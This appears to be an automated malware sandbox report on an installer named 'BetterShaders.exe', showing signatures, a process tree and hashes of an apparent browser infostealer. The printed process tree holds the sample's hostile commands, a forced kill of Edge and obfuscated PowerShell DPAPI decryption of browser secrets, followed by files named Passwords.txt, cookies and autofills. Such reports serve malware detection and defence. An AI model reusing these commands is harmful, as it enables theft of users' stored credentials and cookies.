Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
7Static
static
3BetterShad....0.exe
windows7-x64
7BetterShad....0.exe
windows10-2004-x64
7$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDIR/app-64.7z
windows7-x64
3$PLUGINSDIR/app-64.7z
windows10-2004-x64
3BetterShaders.exe
windows10-2004-x64
7LICENSES.c...m.html
windows7-x64
1LICENSES.c...m.html
windows10-2004-x64
1d3dcompiler_47.dll
windows10-2004-x64
1ffmpeg.dll
windows10-2004-x64
1libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows10-2004-x64
1resources/elevate.exe
windows7-x64
1resources/elevate.exe
windows10-2004-x64
1vk_swiftshader.dll
windows10-2004-x64
1vulkan-1.dll
windows10-2004-x64
1$PLUGINSDI...7z.dll
windows7-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3Analysis
-
max time kernel
151s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
27/05/2024, 14:34
Static task
static1
Behavioral task
behavioral1
Sample
BetterShaders 3.8.0.exe
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
BetterShaders 3.8.0.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/app-64.7z
Resource
win7-20240419-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/app-64.7z
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
BetterShaders.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral10
Sample
LICENSES.chromium.html
Resource
win7-20240215-en
Behavioral task
behavioral11
Sample
LICENSES.chromium.html
Resource
win10v2004-20240508-en
Behavioral task
behavioral12
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral13
Sample
ffmpeg.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral14
Sample
libEGL.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral15
Sample
libGLESv2.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
resources/elevate.exe
Resource
win7-20231129-en
Behavioral task
behavioral17
Sample
resources/elevate.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral18
Sample
vk_swiftshader.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral19
Sample
vulkan-1.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral20
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win7-20240508-en
Behavioral task
behavioral21
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20240426-en
General
-
Target
BetterShaders.exe
-
Size
168.8MB
-
MD5
26e51744ce941b55c7653e9ab229a18f
-
SHA1
bd08f0f5b3f64aba844128dfb2d77312bbef8b46
-
SHA256
3bcf3c61e80cc6346a8af84c89ca2c50a9eef2b6b915c6c73fff8725f1c6b118
-
SHA512
a308443b59a0a5713b99474e30f93a7f8cc98120c11c2f9f5884d5aa61bbf0073a6cfb1c67d676d64656988802fbf1bb8a1f5234df09b1fd2c36f5f7d3fed0a4
-
SSDEEP
1572864:du3SXrDDmfijsEGl0y+Mgp4cLTRN/33i/oHHl9sqPwqZdsJ2DWw3h9JByba/:/XX++LYYyba
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation BetterShaders.exe -
Loads dropped DLL 1 IoCs
pid Process 3892 BetterShaders.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 ipapi.co 29 ipapi.co -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 1632 cmd.exe 3964 cmd.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2832 tasklist.exe -
Kills process with taskkill 1 IoCs
pid Process 2844 taskkill.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 3656 NOTEPAD.EXE 4660 NOTEPAD.EXE 3792 NOTEPAD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3788 vlc.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1592 powershell.exe 1592 powershell.exe 1592 powershell.exe 3472 powershell.exe 3472 powershell.exe 2592 BetterShaders.exe 2592 BetterShaders.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3788 vlc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2832 tasklist.exe Token: SeDebugPrivilege 2844 taskkill.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 3472 powershell.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe Token: SeShutdownPrivilege 3892 BetterShaders.exe Token: SeCreatePagefilePrivilege 3892 BetterShaders.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3788 vlc.exe 3788 vlc.exe 3788 vlc.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3788 vlc.exe 3788 vlc.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3788 vlc.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 3892 wrote to memory of 2232 3892 BetterShaders.exe 99 PID 3892 wrote to memory of 2232 3892 BetterShaders.exe 99 PID 2232 wrote to memory of 2832 2232 cmd.exe 101 PID 2232 wrote to memory of 2832 2232 cmd.exe 101 PID 3892 wrote to memory of 840 3892 BetterShaders.exe 102 PID 3892 wrote to memory of 840 3892 BetterShaders.exe 102 PID 840 wrote to memory of 2844 840 cmd.exe 104 PID 840 wrote to memory of 2844 840 cmd.exe 104 PID 3892 wrote to memory of 1632 3892 BetterShaders.exe 105 PID 3892 wrote to memory of 1632 3892 BetterShaders.exe 105 PID 1632 wrote to memory of 1592 1632 cmd.exe 107 PID 1632 wrote to memory of 1592 1632 cmd.exe 107 PID 3892 wrote to memory of 3964 3892 BetterShaders.exe 108 PID 3892 wrote to memory of 3964 3892 BetterShaders.exe 108 PID 3964 wrote to memory of 3472 3964 cmd.exe 110 PID 3964 wrote to memory of 3472 3964 cmd.exe 110 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 1288 3892 BetterShaders.exe 111 PID 3892 wrote to memory of 4512 3892 BetterShaders.exe 112 PID 3892 wrote to memory of 4512 3892 BetterShaders.exe 112 PID 3892 wrote to memory of 2592 3892 BetterShaders.exe 136 PID 3892 wrote to memory of 2592 3892 BetterShaders.exe 136
Processes
-
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"2⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\system32\taskkill.exetaskkill /IM msedge.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3472
-
-
-
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1920 /prefetch:22⤵PID:1288
-
-
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2140,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:32⤵PID:4512
-
-
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2592
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3624
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Passwords.txt1⤵
- Opens file in notepad (likely ransom note)
PID:3656
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_cookies.zip\Microsoft_Default.txt1⤵
- Opens file in notepad (likely ransom note)
PID:4660
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Autofills.txt1⤵
- Opens file in notepad (likely ransom note)
PID:3792
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\HideUndo.ram"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3788
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f48896adf9a23882050cdff97f610a7f
SHA14c5a610df62834d43f470cae7e851946530e3086
SHA2563ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
SHA51216644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
-
Filesize
1KB
MD568d80cc2ac40ea9e5c7297fba6623c45
SHA105908daef7414f753fa6006082c42485002a7da8
SHA2563b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96
SHA5122c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6
-
Filesize
1.8MB
MD53072b68e3c226aff39e6782d025f25a8
SHA1cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA2567fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA51261ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
-
Filesize
90B
MD58fb196cd3b31b00bb8e35df5c490ade1
SHA1cf7acf3dde5ba8f808be6025cf28dfe573120307
SHA256969fd23147e88067565018fc4141eed85cd208906a8b878b098defeb4156ebf8
SHA5121c101e51db23045dcaf2edf4e414099c3430951afb9625673197f1d21df7cded2c2bd43e02966571c6910d107a5a04b2461bc030e6babe9343090bf05ca63581
-
Filesize
71B
MD54d6eadc6c0ff2a52aae242512cface64
SHA158585d6d017a8c2a597d7b88e98825c59f3368c5
SHA256d177217ce74775a6fdc5d0880f58da76105315c7bf732892b5e11e19c0175e09
SHA51263fd17a1fec1efb41fce70b6b9130de215c63e1ed58a3169139b21cd32f84804d5fbfde5b76a894d83f2c71f8bf594cd855f823dc16ce984f2f3aec228759f58
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82